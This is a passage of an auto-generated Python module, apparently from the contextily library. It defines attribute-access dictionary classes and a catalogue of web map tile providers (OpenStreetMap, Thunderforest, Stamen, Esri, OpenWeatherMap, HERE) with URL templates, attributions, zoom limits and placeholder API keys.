Generated by parse_leaflet_providers.py at 2019-08-01 from leaflet-providers
at commit 9eb968f8442ea492626c9c8f0dac8ede484e6905 (Bumped version to 1.8.0).
"""
class Bunch(dict):
"""A dict with attribute-access"""
def __getattr__(self, key):
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError(key)
def __dir__(self):
return self.keys()
class TileProvider(Bunch):
"""
A dict with attribute-access and that
can be called to update keys
"""
def __call__(self, **kwargs):
new = TileProvider(self) # takes a copy preserving the class
new.update(kwargs)
return new
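# Usage sketch (the provider names are defined further down in this module; the
# API key value is a placeholder you would replace with your own):
#
#     from contextily._providers import providers
#
#     osm = providers.OpenStreetMap.Mapnik            # attribute access via Bunch
#     cycle = providers.Thunderforest.OpenCycleMap(apikey='my-key')  # copy with updated key
#     url = cycle['url'].format(s='a', z=3, x=4, y=2,
#                               variant=cycle['variant'], apikey=cycle['apikey'])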
providers = Bunch(
OpenStreetMap = Bunch(
Mapnik = TileProvider(
url = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors',
name = 'OpenStreetMap.Mapnik'
),
DE = TileProvider(
url = 'https://{s}.tile.openstreetmap.de/tiles/osmde/{z}/{x}/{y}.png',
max_zoom = 18,
attribution = '(C) OpenStreetMap contributors',
name = 'OpenStreetMap.DE'
),
CH = TileProvider(
url = 'https://tile.osm.ch/switzerland/{z}/{x}/{y}.png',
max_zoom = 18,
attribution = '(C) OpenStreetMap contributors',
bounds = [[45, 5], [48, 11]],
name = 'OpenStreetMap.CH'
),
France = TileProvider(
url = 'https://{s}.tile.openstreetmap.fr/osmfr/{z}/{x}/{y}.png',
max_zoom = 20,
attribution = '(C) Openstreetmap France | (C) OpenStreetMap contributors',
name = 'OpenStreetMap.France'
),
HOT = TileProvider(
url = 'https://{s}.tile.openstreetmap.fr/hot/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors, Tiles style by Humanitarian OpenStreetMap Team hosted by OpenStreetMap France',
name = 'OpenStreetMap.HOT'
),
BZH = TileProvider(
url = 'https://tile.openstreetmap.bzh/br/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = '(C) OpenStreetMap contributors, Tiles courtesy of Breton OpenStreetMap Team',
bounds = [[46.2, -5.5], [50, 0.7]],
name = 'OpenStreetMap.BZH'
)
),
OpenSeaMap = TileProvider(
url = 'https://tiles.openseamap.org/seamark/{z}/{x}/{y}.png',
attribution = 'Map data: (C) OpenSeaMap contributors',
name = 'OpenSeaMap'
),
OpenPtMap = TileProvider(
url = 'http://openptmap.org/tiles/{z}/{x}/{y}.png',
max_zoom = 17,
attribution = 'Map data: (C) OpenPtMap contributors',
name = 'OpenPtMap'
),
OpenTopoMap = TileProvider(
url = 'https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png',
max_zoom = 17,
attribution = 'Map data: (C) OpenStreetMap contributors, SRTM | Map style: (C) OpenTopoMap (CC-BY-SA)',
name = 'OpenTopoMap'
),
OpenRailwayMap = TileProvider(
url = 'https://{s}.tiles.openrailwaymap.org/standard/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) OpenRailwayMap (CC-BY-SA)',
name = 'OpenRailwayMap'
),
OpenFireMap = TileProvider(
url = 'http://openfiremap.org/hytiles/{z}/{x}/{y}.png',
max_zoom = 19,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) OpenFireMap (CC-BY-SA)',
name = 'OpenFireMap'
),
SafeCast = TileProvider(
url = 'https://s3.amazonaws.com/te512.safecast.org/{z}/{x}/{y}.png',
max_zoom = 16,
attribution = 'Map data: (C) OpenStreetMap contributors | Map style: (C) SafeCast (CC-BY-SA)',
name = 'SafeCast'
),
Thunderforest = Bunch(
OpenCycleMap = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'cycle',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.OpenCycleMap'
),
Transport = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'transport',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Transport'
),
TransportDark = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'transport-dark',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.TransportDark'
),
SpinalMap = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'spinal-map',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.SpinalMap'
),
Landscape = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'landscape',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Landscape'
),
Outdoors = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'outdoors',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Outdoors'
),
Pioneer = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'pioneer',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Pioneer'
),
MobileAtlas = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'mobile-atlas',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.MobileAtlas'
),
Neighbourhood = TileProvider(
url = 'https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}',
attribution = '(C) Thunderforest, (C) OpenStreetMap contributors',
variant = 'neighbourhood',
apikey = '<insert your api key here>',
max_zoom = 22,
name = 'Thunderforest.Neighbourhood'
)
),
OpenMapSurfer = Bunch(
Roads = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'roads',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.Roads'
),
Hybrid = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'hybrid',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.Hybrid'
),
AdminBounds = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'adminb',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.AdminBounds'
),
ContourLines = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'asterc',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM',
min_zoom = 13,
name = 'OpenMapSurfer.ContourLines'
),
Hillshade = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'asterh',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM, SRTM',
name = 'OpenMapSurfer.Hillshade'
),
ElementsAtRisk = TileProvider(
url = 'https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png',
max_zoom = 19,
variant = 'elements_at_risk',
attribution = 'Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors',
name = 'OpenMapSurfer.ElementsAtRisk'
)
),
Hydda = Bunch(
Full = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'full',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.Full'
),
Base = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'base',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.Base'
),
RoadsAndLabels = TileProvider(
url = 'https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png',
max_zoom = 18,
variant = 'roads_and_labels',
attribution = 'Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors',
name = 'Hydda.RoadsAndLabels'
)
),
MapBox = TileProvider(
url = 'https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}{r}.png?access_token={accessToken}',
attribution = '(C) Mapbox (C) OpenStreetMap contributors Improve this map',
subdomains = 'abcd',
id = 'mapbox.streets',
accessToken = '<insert your access token here>',
name = 'MapBox'
),
Stamen = Bunch(
Toner = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner',
ext = 'png',
name = 'Stamen.Toner'
),
TonerBackground = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-background',
ext = 'png',
name = 'Stamen.TonerBackground'
),
TonerHybrid = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-hybrid',
ext = 'png',
name = 'Stamen.TonerHybrid'
),
TonerLines = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-lines',
ext = 'png',
name = 'Stamen.TonerLines'
),
TonerLabels = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-labels',
ext = 'png',
name = 'Stamen.TonerLabels'
),
TonerLite = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toner-lite',
ext = 'png',
name = 'Stamen.TonerLite'
),
Watercolor = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 1,
max_zoom = 16,
variant = 'watercolor',
ext = 'jpg',
name = 'Stamen.Watercolor'
),
Terrain = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 18,
variant = 'terrain',
ext = 'png',
name = 'Stamen.Terrain'
),
TerrainBackground = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 18,
variant = 'terrain-background',
ext = 'png',
name = 'Stamen.TerrainBackground'
),
TopOSMRelief = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toposm-color-relief',
ext = 'jpg',
bounds = [[22, -132], [51, -56]],
name = 'Stamen.TopOSMRelief'
),
TopOSMFeatures = TileProvider(
url = 'https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}',
attribution = 'Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors',
subdomains = 'abcd',
min_zoom = 0,
max_zoom = 20,
variant = 'toposm-features',
ext = 'png',
bounds = [[22, -132], [51, -56]],
opacity = 0.9,
name = 'Stamen.TopOSMFeatures'
)
),
Esri = Bunch(
WorldStreetMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Street_Map',
attribution = 'Tiles (C) Esri -- Source: Esri, DeLorme, NAVTEQ, USGS, Intermap, iPC, NRCAN, Esri Japan, METI, Esri China (Hong Kong), Esri (Thailand), TomTom, 2012',
name = 'Esri.WorldStreetMap'
),
DeLorme = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Specialty/DeLorme_World_Base_Map',
attribution = 'Tiles (C) Esri -- Copyright: (C)2012 DeLorme',
min_zoom = 1,
max_zoom = 11,
name = 'Esri.DeLorme'
),
WorldTopoMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Topo_Map',
attribution = 'Tiles (C) Esri -- Esri, DeLorme, NAVTEQ, TomTom, Intermap, iPC, USGS, FAO, NPS, NRCAN, GeoBase, Kadaster NL, Ordnance Survey, Esri Japan, METI, Esri China (Hong Kong), and the GIS User Community',
name = 'Esri.WorldTopoMap'
),
WorldImagery = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Imagery',
attribution = 'Tiles (C) Esri -- Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community',
name = 'Esri.WorldImagery'
),
WorldTerrain = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Terrain_Base',
attribution = 'Tiles (C) Esri -- Source: USGS, Esri, TANA, DeLorme, and NPS',
max_zoom = 13,
name = 'Esri.WorldTerrain'
),
WorldShadedRelief = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Shaded_Relief',
attribution = 'Tiles (C) Esri -- Source: Esri',
max_zoom = 13,
name = 'Esri.WorldShadedRelief'
),
WorldPhysical = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'World_Physical_Map',
attribution = 'Tiles (C) Esri -- Source: US National Park Service',
max_zoom = 8,
name = 'Esri.WorldPhysical'
),
OceanBasemap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Ocean_Basemap',
attribution = 'Tiles (C) Esri -- Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri',
max_zoom = 13,
name = 'Esri.OceanBasemap'
),
NatGeoWorldMap = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'NatGeo_World_Map',
attribution = 'Tiles (C) Esri -- National Geographic, Esri, DeLorme, NAVTEQ, UNEP-WCMC, USGS, NASA, ESA, METI, NRCAN, GEBCO, NOAA, iPC',
max_zoom = 16,
name = 'Esri.NatGeoWorldMap'
),
WorldGrayCanvas = TileProvider(
url = 'https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}',
variant = 'Canvas/World_Light_Gray_Base',
attribution = 'Tiles (C) Esri -- Esri, DeLorme, NAVTEQ',
max_zoom = 16,
name = 'Esri.WorldGrayCanvas'
)
),
OpenWeatherMap = Bunch(
Clouds = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'clouds',
name = 'OpenWeatherMap.Clouds'
),
CloudsClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'clouds_cls',
name = 'OpenWeatherMap.CloudsClassic'
),
Precipitation = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'precipitation',
name = 'OpenWeatherMap.Precipitation'
),
PrecipitationClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'precipitation_cls',
name = 'OpenWeatherMap.PrecipitationClassic'
),
Rain = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'rain',
name = 'OpenWeatherMap.Rain'
),
RainClassic = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'rain_cls',
name = 'OpenWeatherMap.RainClassic'
),
Pressure = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'pressure',
name = 'OpenWeatherMap.Pressure'
),
PressureContour = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'pressure_cntr',
name = 'OpenWeatherMap.PressureContour'
),
Wind = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'wind',
name = 'OpenWeatherMap.Wind'
),
Temperature = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'temp',
name = 'OpenWeatherMap.Temperature'
),
Snow = TileProvider(
url = 'http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}',
max_zoom = 19,
attribution = 'Map data (C) OpenWeatherMap',
apiKey = '<insert your api key here>',
opacity = 0.5,
variant = 'snow',
name = 'OpenWeatherMap.Snow'
)
),
HERE = Bunch(
normalDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDay'
),
normalDayCustom = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.custom',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayCustom'
),
normalDayGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayGrey'
),
normalDayMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayMobile'
),
normalDayGreyMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.grey.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayGreyMobile'
),
normalDayTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayTransit'
),
normalDayTransitMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day.transit.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalDayTransitMobile'
),
normalNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNight'
),
normalNightMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightMobile'
),
normalNightGrey = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.grey',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightGrey'
),
normalNightGreyMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.grey.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightGreyMobile'
),
normalNightTransit = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.transit',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightTransit'
),
normalNightTransitMobile = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.night.transit.mobile',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.normalNightTransitMobile'
),
reducedDay = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'reduced.day',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.reducedDay'
),
reducedNight = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'reduced.night',
max_zoom = 20,
type = 'maptile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.reducedNight'
),
basicMap = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'basetile',
language = 'eng',
format = 'png8',
size = '256',
name = 'HERE.basicMap'
),
mapLabels = TileProvider(
url = 'https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}',
attribution = 'Map (C) 1987-2019 HERE',
subdomains = '1234',
mapID = 'newest',
app_id = '<insert your app_id here>',
app_code = '<insert your app_code here>',
base = 'base',
variant = 'normal.day',
max_zoom = 20,
type = 'labeltile',
language = 'eng',
